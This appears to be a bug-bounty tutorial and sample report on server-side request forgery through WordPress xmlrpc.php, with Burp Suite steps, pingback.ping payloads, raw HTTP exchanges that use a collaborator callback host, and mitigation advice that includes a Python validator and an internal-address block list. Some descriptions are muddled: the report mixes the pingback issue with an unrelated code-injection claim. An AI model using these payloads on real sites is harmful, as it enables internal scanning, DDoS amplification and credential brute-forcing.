XMLRPC Attack leads to SSRF (SSRF via XMLRPC)

In this Article

  • What is an XMLRPC Attack?
  • What is an SSRF Attack?
  • SSRF via XMLRPC
  • How to Perform SSRF via XMLRPC?
  • Reporting
  • Impact
  • Mitigation

What is an XMLRPC Attack?

XML-RPC is a simple and widely supported protocol that has been used in various applications, such as web services, blogging platforms, content management systems, and remote administration of software systems. It provides a standardized way for different software components to interact and exchange data in a cross-platform manner.

If an XML-RPC implementation is vulnerable to remote code execution, an attacker can send specially crafted XML-RPC requests to execute arbitrary code on the server. This can lead to unauthorized access, data breaches, or further exploitation of the system.

What is an SSRF Attack?
A Server-Side Request Forgery (SSRF) attack is a vulnerability in which an attacker manipulates a web application into making unintended requests to internal or external resources on behalf of the server. This attack can be particularly dangerous when it targets a search engine.

The consequences of an SSRF attack on a search engine vary with the server's configuration and the nature of the forged requests; the XML-RPC case and its possible outcomes are covered in the sections that follow.

SSRF via XMLRPC Attack
SSRF via XML-RPC is a specific attack that uses XML-RPC functionality (in WordPress, the pingback.ping method) to trigger a Server-Side Request Forgery: the attacker makes the targeted server initiate requests to other internal or external resources on its own behalf. Through this, an attacker can potentially reach sensitive data, perform port scanning, or attack internal systems that are not reachable from outside.

How To Perform SSRF via XMLRPC?
STEP #1: Append xmlrpc.php to the site's URL and visit it. If the endpoint is enabled, the server replies with "XML-RPC server accepts POST requests only".

STEP #2: Capture the request to that URL in Burp Suite and send it to Repeater. Change the request method from GET to POST.

STEP #3: Put the first XML-RPC method call in the request body. The response lists every method the server exposes:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Any of the listed methods can then be called the same way; pingback.ping is the one that matters here.

STEP #4: If pingback.ping is listed, the server can be made to perform Server-Side Request Forgery (SSRF) through xmlrpc.php. Now send the second XML-RPC method call, with your Burp Collaborator URL as the first parameter and the site's own URL as the second:

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>BURP-COLLABORATOR-URL-HERE</string></value>
</param>
<param>
<value><string>TARGET-WEBSITE-URL-HERE</string></value>
</param>
</params>
</methodCall>

STEP #5: Poll the Burp Collaborator tab. A DNS lookup and an HTTP request arriving from the target server's IP address confirm that the server fetched the attacker-supplied URL; that server address is what an attacker would go on to scan for open ports.
Because the request originates from the server itself, the same mechanism lets an attacker gather information about hosts behind it, escalate to unauthorized access to internal systems, or pivot further into the network infrastructure.

Impact:
SSRF attacks can enable an attacker to scan internal networks or external systems accessible by the server. By requesting URLs that correspond to internal IP addresses or other external targets, the attacker can perform network reconnaissance, identify open ports, or search for additional vulnerabilities to exploit.

If the attacker can pivot from SSRF to other internal systems through the compromised server, they may gain unauthorized access to critical resources. This could involve accessing additional servers, databases, or administrative panels. Unauthorized access can lead to further data breaches, manipulation of system configurations, or privilege escalation attacks.

Mitigation:
Mitigating SSRF (Server-Side Request Forgery) via XML-RPC involves several measures that stop the server from making unauthorized requests and protect sensitive resources:

1. Use URL filtering to block requests to internal or sensitive resources. Maintain a blacklist of known malicious URLs and internal-only addresses that must never be reached via XML-RPC, and block or sanitize requests that match it. Apply the check to the address the URL actually resolves to, not only to the hostname string, and repeat it on every redirect; otherwise a public name that resolves to an internal address bypasses the filter.
2. Implement strict input validation on XML-RPC requests so that only valid, expected URLs are accepted. Validate the URL parameter to reject internal or malicious addresses, and maintain a whitelist of trusted external resources that the server is allowed to contact via XML-RPC.
3. Run the XML-RPC-enabled server under the principle of least privilege. Restrict its access rights to the resources and functionality its operation actually needs, and avoid unnecessary permissions or elevated privileges that could be abused in an SSRF attack.
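As an added example (not code from the article or from WordPress itself), the following Python validator applies mitigation items 1 and 2 to the pingback.ping request from the steps above: it parses the methodCall body, accepts only http(s) sources on standard ports, and rejects any source whose host is, or resolves to, an internal address. The resolver lookup table and the hostnames in it are constructed for the example.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

# Constructed resolver stand-in so the check runs offline; real code resolves via DNS and re-checks each redirect hop.
FAKE_DNS = {"blog.example.com": "198.51.100.7", "metadata.internal": "169.254.169.254"}

# Address ranges the server must never be induced to contact (mitigation item 1).
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

def pingback_body(source: str, target: str) -> str:
    """Build the two-parameter pingback.ping call shown in the article."""
    return ("<methodCall><methodName>pingback.ping</methodName><params>"
            f"<param><value><string>{escape(source)}</string></value></param>"
            f"<param><value><string>{escape(target)}</string></value></param></params></methodCall>")

def parse_method_call(body: str):
    # Returns (methodName, list of string params) from an XML-RPC methodCall body.
    root = ET.fromstring(body)
    name = root.findtext("methodName", default="").strip()
    return name, [v.text or "" for v in root.iterfind("params/param/value/string")]

def host_is_internal(host: str, resolve=FAKE_DNS.get) -> bool:
    # True when host is, or resolves to, a blocked address, or cannot be resolved at all.
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                 # not a literal address: resolve the name
        addr = resolve(host)
        if addr is None:
            return True                # unresolvable: refuse rather than let the server try
        ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return any(ip in net for net in BLOCKED_NETS)

def vet_pingback(body: str, resolve=FAKE_DNS.get) -> tuple:
    # Decide whether the server may act on this request: returns (allowed, reason).
    name, params = parse_method_call(body)
    if name != "pingback.ping":
        return False, f"method {name!r} is not permitted"
    if len(params) != 2:
        return False, "pingback.ping takes exactly two string parameters"
    u = urlsplit(params[0])            # sourceURI: the URL the server would fetch
    if u.scheme not in ("http", "https") or not u.hostname:
        return False, "source must be an http(s) URL with a host"
    if u.port not in (None, 80, 443):
        return False, "non-standard port rejected (defeats XSPA port probing)"
    if host_is_internal(u.hostname, resolve):
        return False, f"source host {u.hostname!r} is internal or unresolvable"
    return True, "ok"
```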

How to Report?
Hello Team,
I'm Career Technology Cyber security India, a white-hat security researcher from Mumbai, INDIA. I found a vulnerability on your website.

Vulnerability Name: XML-RPC & SSRF via XMLRPC 

Description:
“XML-RPC” also refers generically to the use of XML for a remote procedure call, independently of the specific protocol. XML-RPC for PHP is affected by a remote code-injection vulnerability. An attacker may exploit this issue to execute arbitrary commands or code in the context of the web server.

Vulnerable URL: https://exmple.com/xmlrpc.php

Steps to Reproduce:
1. Go to the website: https://exmple.com
2. Append xmlrpc.php to the website URL
3. Capture the request to the vulnerable URL in Burp Suite
4. Send the request to Repeater in Burp Suite
5. Change the request method from GET to POST
6. Put the first XML-RPC method call in the request body:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

Response:
HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:41:22 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3NOLmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 4273
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><string>system.multicall</string></value>
  <value><string>system.listMethods</string></value>
  <value><string>system.getCapabilities</string></value>
  <value><string>demo.addTwoNumbers</string></value>
  <value><string>demo.sayHello</string></value>
  <value><string>pingback.extensions.getPingbacks</string></value>
  <value><string>pingback.ping</string></value>
  <value><string>mt.publishPost</string></value>
  <value><string>mt.getTrackbackPings</string></value>
  <value><string>mt.supportedTextFilters</string></value>
  <value><string>mt.supportedMethods</string></value>
  <value><string>mt.setPostCategories</string></value>
  <value><string>mt.getPostCategories</string></value>
  <value><string>mt.getRecentPostTitles</string></value>
  <value><string>mt.getCategoryList</string></value>
  <value><string>metaWeblog.getUsersBlogs</string></value>
  <value><string>metaWeblog.deletePost</string></value>
  <value><string>metaWeblog.newMediaObject</string></value>
  <value><string>metaWeblog.getCategories</string></value>
  <value><string>metaWeblog.getRecentPosts</string></value>
  <value><string>metaWeblog.getPost</string></value>
  <value><string>metaWeblog.editPost</string></value>
  <value><string>metaWeblog.newPost</string></value>
  <value><string>blogger.deletePost</string></value>
  <value><string>blogger.editPost</string></value>
  <value><string>blogger.newPost</string></value>
  <value><string>blogger.getRecentPosts</string></value>
  <value><string>blogger.getPost</string></value>
  <value><string>blogger.getUserInfo</string></value>
  <value><string>blogger.getUsersBlogs</string></value>
  <value><string>wp.restoreRevision</string></value>
  <value><string>wp.getRevisions</string></value>
  <value><string>wp.getPostTypes</string></value>
  <value><string>wp.getPostType</string></value>
  <value><string>wp.getPostFormats</string></value>
  <value><string>wp.getMediaLibrary</string></value>
  <value><string>wp.getMediaItem</string></value>
  <value><string>wp.getCommentStatusList</string></value>
  <value><string>wp.newComment</string></value>
  <value><string>wp.editComment</string></value>
  <value><string>wp.deleteComment</string></value>
  <value><string>wp.getComments</string></value>
  <value><string>wp.getComment</string></value>
  <value><string>wp.setOptions</string></value>
  <value><string>wp.getOptions</string></value>
  <value><string>wp.getPageTemplates</string></value>
  <value><string>wp.getPageStatusList</string></value>
  <value><string>wp.getPostStatusList</string></value>
  <value><string>wp.getCommentCount</string></value>
  <value><string>wp.deleteFile</string></value>
  <value><string>wp.uploadFile</string></value>
  <value><string>wp.suggestCategories</string></value>
  <value><string>wp.deleteCategory</string></value>
  <value><string>wp.newCategory</string></value>
  <value><string>wp.getTags</string></value>
  <value><string>wp.getCategories</string></value>
  <value><string>wp.getAuthors</string></value>
  <value><string>wp.getPageList</string></value>
  <value><string>wp.editPage</string></value>
  <value><string>wp.deletePage</string></value>
  <value><string>wp.newPage</string></value>
  <value><string>wp.getPages</string></value>
  <value><string>wp.getPage</string></value>
  <value><string>wp.editProfile</string></value>
  <value><string>wp.getProfile</string></value>
  <value><string>wp.getUsers</string></value>
  <value><string>wp.getUser</string></value>
  <value><string>wp.getTaxonomies</string></value>
  <value><string>wp.getTaxonomy</string></value>
  <value><string>wp.getTerms</string></value>
  <value><string>wp.getTerm</string></value>
  <value><string>wp.deleteTerm</string></value>
  <value><string>wp.editTerm</string></value>
  <value><string>wp.newTerm</string></value>
  <value><string>wp.getPosts</string></value>
  <value><string>wp.getPost</string></value>
  <value><string>wp.deletePost</string></value>
  <value><string>wp.editPost</string></value>
  <value><string>wp.newPost</string></value>
  <value><string>wp.getUsersBlogs</string></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>

7. I was able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file:

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 265

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://s4xi0a4xhtoh4sxjsev7eqlpfgl69v.oastify.com</string></value>
</param>
<param>
<value><string>https://exmple.com</string></value>
</param>
</params>
</methodCall>


Response:
HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:59:35 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3N0LmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 370
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>0</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string></string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Impact:
1) This can be automated from multiple hosts and used to cause a mass DDoS attack on the victim.
2) The same method is also used for brute-force attacks to steal admin credentials and other important credentials.

Plus, there are a lot of PoCs lying around the web concerning the vulnerabilities associated with XMLRPC.php in WordPress websites.

XML-RPC pingback attacks:
In this case, an attacker is able to leverage the default XML-RPC API to perform callbacks for the following purposes:

Distributed denial-of-service (DDoS) attacks - An attacker executes the pingback.ping method from several affected WordPress installations against a single unprotected target (botnet level).

XSPA (Cross Site Port Attack) - An attacker can execute the pingback.ping method from a single affected WordPress installation against the same host (or another internal/private host) on different ports. An open port or a live internal host can be identified by observing differences in response time and/or in the content of the response.

Supporting Material/References:
1) https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/
2) https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
3) https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

How do I block XML-RPC?
Method 1 - Plugin
1. Log into your WordPress Admin Dashboard.
2. Click on Plugins >> Add New.
3. Search for "Disable XML-RPC" and install the Disable XML-RPC plugin.
4. Simply activate the plugin, and that's it! XML-RPC should be disabled.
5. You can recheck using the XML-RPC Validator.

Please find attached screenshots with step-by-step guidance to help reproduce the vulnerability.

Thanks & Regards,
Career Technology Cyber security India
Indian Bug Hunter
